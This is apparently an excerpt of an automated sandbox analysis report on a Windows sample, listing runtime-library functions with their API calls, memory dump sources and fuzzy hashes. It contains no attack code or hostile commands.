                                                                                                                                                                                                                                                                                        Function 0042153C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                        • Opcode ID: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
                                                                                                                                                                                                                                                                                        • Instruction ID: feac748cf68cf789a777818c524f5d4ea303f7336cb9653a69c72d87dadf9180
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74C25B71E046289FDB25CE28ED407EAB7B5EB94304F5441EBD80DE7250E7B8AE818F45
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220A2E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04220D4D,?,00000000), ref: 04220AC7
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04220D4D,?,00000000), ref: 04220AF0
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,04220D4D,?,00000000), ref: 04220B05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction ID: 8d6b714964492edd1ae961ff70d64d0e807aecd865e64fb93fa8b09a195a7cb8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17218122720126BAD7308F54CA00B9B72E7EB54B54B968465EB0AD7110FB72FD41C390
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220C02 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04220D0E
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 04220D69
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 04220D78
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,042145A4,00000040,?,042146C4,00000055,00000000,?,?,00000055,00000000), ref: 04220DC0
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,04214624,00000040), ref: 04220DDF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 745075371-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction ID: 2b9469d5cc75af076333915a9007755543c35fb08a55e52590e03d3e81a485dc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6513F71B2122ABEEB20DFA5CD40BBA73B8EF48700F544469EA04E7151DBB0B9448B61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042202CA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,042145AB,?,?,?,?,04214002,?,00000004), ref: 042203AC
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0422043C
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0422044A
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,042145AB,00000000,042146CB), ref: 042204ED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4212172061-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction ID: b17d4cc4a9e875dfa9a0e6a284c4633a69af131642765dab0b521f6df074df4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A61F771720627BBE724AB74CD41BBB73ACEF48704F14456AEA05DB191EA70F940C7A4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00420326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID: =CA${B
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                                                                        • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042044E Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2829624132-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                                                                        • Instruction ID: 67309229f61afd2ab5856e0fbe736b03e5ebd4e934039cb527c6d869dde023b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0619F71A00127ABDB28DF25EC82BBB77E8EF44314F50406AED05C6682E778D995CF58
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 9ac9671248c07c9c342bf92be5d06c8e759fe12cce2f5fd6b0acbfcbce77c00d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3531C3749012189BCB21EF25DD887CDB7B4BF08310F5041EAE41CA7291EB749F858F88
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042109A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04210A9A
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04210AA4
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04210AB1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b967f48d8aa8fa85fe880a4205203fd1466cb8413e7bfd8c3a05fedd7b42045
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3831B474A1121D9BDB21DF64D98879DBBF4BF08310F5041EAE51CA72A1EB30AB858F44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04213C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,04213C24,00000003,00439450,0000000C,04213D7B,00000003,00000002,00000000,?,04212DD2,00000003), ref: 04213C6F
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,04213C24,00000003,00439450,0000000C,04213D7B,00000003,00000002,00000000,?,04212DD2,00000003), ref: 04213C76
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 04213C88
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2530dcc90288b5bd51ed7f0d94637f0d1362cee91a883996099ef4279f7e0f6a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E0BF31211545ABDF11AF54DD08A593FAAFF54285B418028FD0646231CB35EA53CA84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                        • Instruction ID: 146e09ecf9d5328e4e0b558be605c6a6ff4e14acec4e23645b533189d3af5a7f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB316BB6A10609DFEB10CF99D880BADBBF5FF08724F14804AD541A7251D7B1FA45CBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041D9E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                        • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421DC48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                        • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction ID: 6befaf63bffbf4c90ac72d88c8c27f85ccb355236c0090c9daba6852a1663104
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131FB72A20249AFDB249E78CC84EFB7BFDDF85314F140598E518D7261D670B945CB50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004203C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID: =CA
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-159236625
                                                                                                                                                                                                                                                                                        • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                        • Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                                                                        • Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D
